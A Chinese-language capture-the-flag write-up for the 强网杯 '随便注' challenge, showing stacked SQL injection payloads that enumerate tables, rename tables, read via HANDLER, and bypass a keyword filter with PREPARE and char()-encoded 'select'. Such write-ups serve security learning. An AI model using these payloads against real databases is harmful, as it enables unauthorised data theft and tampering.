[强网杯]随便注

Posted 2021-03-02 rainsw0rd

[强网杯]随便注

当所需的语句被ban时可以考虑，用其他方式实现该语句。但是如果想不出同样可以考虑改变数据来利用本来执行的语句。

打开页面，一个输入框，前端注释写了一个SQLMAP是没有灵魂的23333（为我的sqlmap R.I.P），很明显是个注入题。Fuzz之后得到提示过滤了一些参数，并且发现存在堆叠注入。

return preg_match("/select|update|delete|drop|insert|where|./i",$inject);

111‘;show databases#	//查库

111‘;show tables#		//查表

111‘;desc `1919810931114514`;#		//查1919810931114514中的列

111‘;desc words#			//查words中的列

1‘order by 2#
1‘order by 3#    //得出select了两个数据

因为查询了两个数据，所以查的时words表中的，猜测语句为。

select id,data from words where id = ‘$_GET[inject]‘

方式一

此时我们可以想办法让两表调换，让原语句对我们想要查询的表和字段查询。

• 修改表名语法

mysql> ALTER TABLE testalter_tbl RENAME TO alter_tbl;

• 修改字段名及类型语法

mysql> ALTER TABLE testalter_tbl CHANGE i j BIGINT;

EXP：

111‘;rename table words to qwq;rename table `1919810931114514` to words;alter table words change flag id varchar(100)#

这里要注意不要逐句注入，否则前语句会发生错误导致之后无法执行任何语句

最后爆id拿到flag

1‘or 1=1#

方式二

当在Mysql数据库的情况下我们可以使用handler语句。

• 语法

HANDLER tbl_name OPEN [ [AS] alias]
 
HANDLER tbl_name READ index_name { = | <= | >= | < | > } (value1,value2,...)
    [ WHERE where_condition ] [LIMIT ... ]
HANDLER tbl_name READ index_name { FIRST | NEXT | PREV | LAST }
    [ WHERE where_condition ] [LIMIT ... ]
HANDLER tbl_name READ { FIRST | NEXT }
    [ WHERE where_condition ] [LIMIT ... ]
 
HANDLER tbl_name CLOSE

EXP:

‘;handler `1919810931114514` open;handler `1919810931114514` read first#

方式三

预处理语句

PREPARE name from ‘[my sql sequece]‘; //预定义SQL语句
EXECUTE name; //执行预定义SQL语句
(DEALLOCATE || DROP) PREPARE name; //删除预定义SQL 语句

变量传递

SET @tn = ‘hahaha‘; //存储表名
SET @sql = concat(‘select * from ‘, @tn); //存储SQL语句
PREPARE name from @sql; //预定义SQL语句
EXECUTE name; //执行预定义SQL语句
(DEALLOCATE || DROP) PREPARE sqla; //删除预定义SQL语句

EXP：

111‘;PREPARE hacker from concat(char(115,101,108,101,99,116), ‘ * from `1919810931114514` ‘);EXECUTE hacker;#

111‘;SET @sqli=concat(char(115,101,108,101,99,116),‘* from `1919810931114514`‘);PREPARE hacker from @sqli;EXECUTE hacker;#